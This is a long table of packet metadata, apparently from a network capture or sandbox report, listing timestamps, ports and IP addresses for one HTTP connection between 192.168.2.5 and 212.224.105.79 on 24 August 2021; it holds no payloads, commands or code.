Aug 24, 2021 08:49:20.109524965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109540939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109546900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109549999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109556913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109572887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109590054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109599113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109602928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109610081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109627008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109642982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109661102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109675884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109692097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109695911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109704971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109718084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109721899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109726906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109731913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109740973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109752893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109766006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109783888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109800100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.109807968 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109811068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109858036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.109869003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.110678911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.110697985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.111186028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.118513107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118532896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118546963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118565083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118581057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118599892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118618011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118633032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118650913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118664026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118676901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118688107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118700981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118717909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118731976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118743896 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.118748903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118757963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.118765116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118784904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.118807077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.118809938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.120613098 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.123526096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.123544931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.123562098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.123579025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.123727083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.123738050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.125083923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125128031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125145912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125163078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125190020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125206947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125233889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125252008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125274897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.125283003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.125406027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125422955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125463963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.125468969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.125485897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125504971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125519991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125539064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125557899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125574112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.125581026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.125583887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126059055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126085997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126102924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126117945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126127958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126132011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126137018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126153946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126172066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126187086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126204014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126210928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126215935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126224041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126240969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126257896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126267910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126271009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126275063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126291990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126308918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126326084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126343012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126346111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126349926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126363993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126382113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126398087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126415014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126420021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126421928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126430035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126446009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126461983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126477957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126483917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126487017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126497984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126514912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126532078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.126565933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.126568079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.127147913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.128182888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.128201008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.129159927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133060932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133080959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133100033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133117914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133133888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133150101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133167028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133169889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133183956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133202076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133218050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133238077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133239031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133241892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133255959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133272886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133285999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133302927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133322001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133323908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133327961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133341074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133357048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133373976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133378983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133383989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133392096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133407116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133424044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133440018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133449078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133452892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133460045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133479118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133495092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133512020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133527994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133539915 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133543015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133543968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133562088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133578062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133596897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133614063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133620977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133625031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133630991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133649111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133666039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133682013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133692980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133697033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133697987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133714914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133733988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133750916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133760929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133764029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133768082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133791924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133810043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133817911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133822918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133826971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133843899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133861065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133877993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133893967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133905888 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133908987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133910894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133932114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133949995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133965969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.133970976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.133975029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.134185076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.134233952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.134238005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.134287119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.134414911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.134541988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.134561062 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.134572029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.134882927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.134891033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.134958029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.135129929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.135188103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.135998011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136145115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136338949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136368990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136464119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136558056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136601925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136607885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136662960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136682034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136697054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136717081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136735916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136754036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136770010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136785984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136791945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136795998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136801958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136821985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136838913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136850119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136852980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136859894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136878014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136894941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136912107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136926889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136940956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136945009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.136945009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136961937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136977911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.136997938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137017012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137026072 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137031078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137034893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137052059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137069941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137089014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137105942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137114048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137116909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137123108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137141943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137161016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137173891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137177944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137177944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137192011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137207985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137228966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137245893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137254000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137258053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137264013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137281895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137299061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137314081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137330055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137346029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137352943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137356043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137366056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137383938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137394905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137407064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137423038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137435913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137447119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137450933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137451887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137454033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137465000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137481928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137496948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137509108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137521029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137532949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137543917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137557030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137567997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137583971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137595892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.137620926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137625933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137628078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.137800932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.141232967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141251087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141263008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141279936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141318083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141335011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141350985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141366959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141372919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.141380072 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.141382933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141398907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141417980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141434908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141450882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141455889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.141458035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.141468048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141484022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141499996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141509056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.141513109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.141515970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141531944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.141581059 CEST	49712	80	192.168.2.5	212.224.105.79
